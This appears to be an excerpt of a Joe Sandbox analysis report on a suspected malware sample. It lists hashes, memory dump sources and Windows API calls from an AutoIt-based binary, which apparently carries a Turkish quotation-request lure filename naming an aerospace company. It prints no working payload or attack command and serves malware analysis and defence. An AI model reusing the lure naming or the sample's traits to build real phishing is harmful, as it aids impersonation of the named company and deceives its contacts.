                                                                                                                                    • Instruction ID: 7889417426b11ef3f517e9fec82873859838f90b612951d6d54349ab3803c9eb
                                                                                                                                    • Opcode Fuzzy Hash: b0acabf8008adc580424e1767e94632d2b041dbf4ad130831bd077d0382d77fa
                                                                                                                                    • Instruction Fuzzy Hash: 0D0282B1A00209EBDF04DF64D881BAEB7F5FF64300F158169E816DB291EB31EA51CB95
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                    • Instruction ID: a9de0b38592e351c309d09ab2bbafc9f63145b9df204594ba3fbc2f1428f7933
                                                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                    • Instruction Fuzzy Hash: B391667B1080A35ADB2E467E857807EFFE15A933B1B1A079DD4F2CA1C5FF248958D620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                    • Instruction ID: f59e8cfde2b867cb84976ae663e52cdf24c214c7c68cde6879306e23b110ac98
                                                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                    • Instruction Fuzzy Hash: 12912F7A2090E35ADB2D467A857403EFFF15A933A2B1A079ED4F2CB1C5FF248564D620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d3db3505fa3c263367321eb7658ccfd6145d7fea63fc6b8f9ff9f83f71b7f00
                                                                                                                                    • Instruction ID: 575d8710cc219aabc542a85542d1eb2d309db479e6b1158a797ff3a5f915b97a
                                                                                                                                    • Opcode Fuzzy Hash: 7d3db3505fa3c263367321eb7658ccfd6145d7fea63fc6b8f9ff9f83f71b7f00
                                                                                                                                    • Instruction Fuzzy Hash: 006148BD608709AADA38AA288D95BBF2398DF53710F180919E842DB2C1DB119F428365
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                    • Instruction ID: 035ac50aa114b85376c7ff6d9588af1ce9923408151ea6b464ac3dd00aee8d0f
                                                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                    • Instruction Fuzzy Hash: A881967B6080A31DDB6D427A853403EFFE15A933A5B1A079ED4F2CB1C1EF24C954E620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                    • Instruction ID: 41e843f9d6327142bd717b58e2b01b5710d630a9122c7bf09e0cacdffd62edd6
                                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                    • Instruction Fuzzy Hash: 2B41C471D1051CDBDF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                    • Instruction ID: c73fd9d0372ba210dc860fb0d55ccc0b8166b2320741a82b41488bec2de81a24
                                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                    • Instruction Fuzzy Hash: 2D019D78A00209EFDB84DF98C5949AEF7B5FB48310F608699E809E7741E730AE51DB80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                    • Instruction ID: 37a84f545be361a6f41278005e3d7343be4d7ebdda888a8a24a124c5054f1aa5
                                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                    • Instruction Fuzzy Hash: CA019278A00109EFDB44DF98C5949AEF7B5FB48310F608599D819E7701D730AE51DB80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00202B30
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00202B43
                                                                                                                                    • DestroyWindow.USER32 ref: 00202B52
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00202B6D
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00202B74
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00202CA3
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00202CB1
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202CF8
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00202D04
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00202D40
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D62
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D75
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D80
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00202D89
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D98
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00202DA1
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202DA8
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00202DB3
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202DC5
                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0021FC38,00000000), ref: 00202DDB
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00202DEB
                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00202E11
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00202E30
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202E52
                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0020303F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                    • Opcode ID: ab0935688946846bd5732f16389e7f52005029418fcb413f5b5190dd0c7bab88
                                                                                                                                    • Instruction ID: 11a86f3bbc9c80ae1fe1bf4eb7cd76436342fb4e6a03df9b973cdfdcf8511374
                                                                                                                                    • Opcode Fuzzy Hash: ab0935688946846bd5732f16389e7f52005029418fcb413f5b5190dd0c7bab88
                                                                                                                                    • Instruction Fuzzy Hash: 82029A75910209EFDB14DFA4DC8DEAE7BB9EB49710F208159F915AB2A1CB70AD01CF60
                                                                                                                                    APIs
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0021712F
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00217160
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0021716C
                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00217186
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00217195
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002171C0
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 002171C8
                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 002171CF
                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 002171DE
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002171E5
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00217230
                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00217262
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00217284
                                                                                                                                      • Part of subcall function 002173E8: GetSysColor.USER32(00000012), ref: 00217421
                                                                                                                                      • Part of subcall function 002173E8: SetTextColor.GDI32(?,?), ref: 00217425
                                                                                                                                      • Part of subcall function 002173E8: GetSysColorBrush.USER32(0000000F), ref: 0021743B
                                                                                                                                      • Part of subcall function 002173E8: GetSysColor.USER32(0000000F), ref: 00217446
                                                                                                                                      • Part of subcall function 002173E8: GetSysColor.USER32(00000011), ref: 00217463
                                                                                                                                      • Part of subcall function 002173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00217471
                                                                                                                                      • Part of subcall function 002173E8: SelectObject.GDI32(?,00000000), ref: 00217482
                                                                                                                                      • Part of subcall function 002173E8: SetBkColor.GDI32(?,00000000), ref: 0021748B
                                                                                                                                      • Part of subcall function 002173E8: SelectObject.GDI32(?,?), ref: 00217498
                                                                                                                                      • Part of subcall function 002173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002174B7
                                                                                                                                      • Part of subcall function 002173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002174CE
                                                                                                                                      • Part of subcall function 002173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002174DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                    • Opcode ID: e449238219badb04524a0d8e79dbc32b49e1c98479a428cc1523b45db172b66f
                                                                                                                                    • Instruction ID: 7283d4f528a5314b82256888039a5116f59e2d5162a5c9420f975a353b430b41
                                                                                                                                    • Opcode Fuzzy Hash: e449238219badb04524a0d8e79dbc32b49e1c98479a428cc1523b45db172b66f
                                                                                                                                    • Instruction Fuzzy Hash: 0AA1B076058301BFDB009F60EC4CA9B7BF9FB98320F204A19F966A61E0DB70E945CB51
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00198E14
                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 001D6AC5
                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001D6AFE
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001D6F43
                                                                                                                                      • Part of subcall function 00198F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00198BE8,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198FC5
                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 001D6F7F
                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001D6F96
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 001D6FAC
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 001D6FB7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                    • Opcode ID: 825959595e82e3f82f883393e00fca7f5bbe8924a35dcf10ecd504895545ec9b
                                                                                                                                    • Instruction ID: 929074453c68b3caebf6706305a75e8bdb5d1363296acb88bf21fccaa8a4dd6f
                                                                                                                                    • Opcode Fuzzy Hash: 825959595e82e3f82f883393e00fca7f5bbe8924a35dcf10ecd504895545ec9b
                                                                                                                                    • Instruction Fuzzy Hash: A712BD34600611EFDB25CF28E898BBAB7E5FB55301F24856AF4958B261CB31EC51CF91
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0020273E
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0020286A
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002028A9
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002028B9
                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00202900
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0020290C
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00202955
                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00202964
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00202974
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00202978
                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00202988
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00202991
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0020299A
                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002029C6
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 002029DD
                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00202A1D
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00202A31
                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00202A42
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00202A77
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00202A82
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00202A8D
                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00202A97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                    • Opcode ID: 9fcf96532ab4a743d4ada18a98d731edaf5022bb05451fdbaf6bc45be262b18b
                                                                                                                                    • Instruction ID: b10b85b4d2711d865679d81cd1a796f551a7b07d2fed912c74cdd0dd515c95a6
                                                                                                                                    • Opcode Fuzzy Hash: 9fcf96532ab4a743d4ada18a98d731edaf5022bb05451fdbaf6bc45be262b18b
                                                                                                                                    • Instruction Fuzzy Hash: C6B18B75A40205BFEB14DF68DC89FAEBBA9EB08710F108155F914E72E1DB70AD10CBA4
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001F4AED
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0021CB68,?,\\.\,0021CC08), ref: 001F4BCA
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0021CB68,?,\\.\,0021CC08), ref: 001F4D36
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                    • Opcode ID: d671423e51c37d4aedf903ad4bb21d53a7090d65c22ffcd546ba116412c990a6
                                                                                                                                    • Instruction ID: a081f4bcee2141af42244455b7b9b391dfbadc1ef799107d48fc5f4f001f115f
                                                                                                                                    • Opcode Fuzzy Hash: d671423e51c37d4aedf903ad4bb21d53a7090d65c22ffcd546ba116412c990a6
                                                                                                                                    • Instruction Fuzzy Hash: EB61F630B0520DDBCB0CEF64C989DBE77B0AF56710B249015F906AB692CB32DE52DB52
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00217421
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00217425
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0021743B
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00217446
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0021744B
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00217463
                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00217471
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00217482
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0021748B
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00217498
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002174B7
                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002174CE
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 002174DB
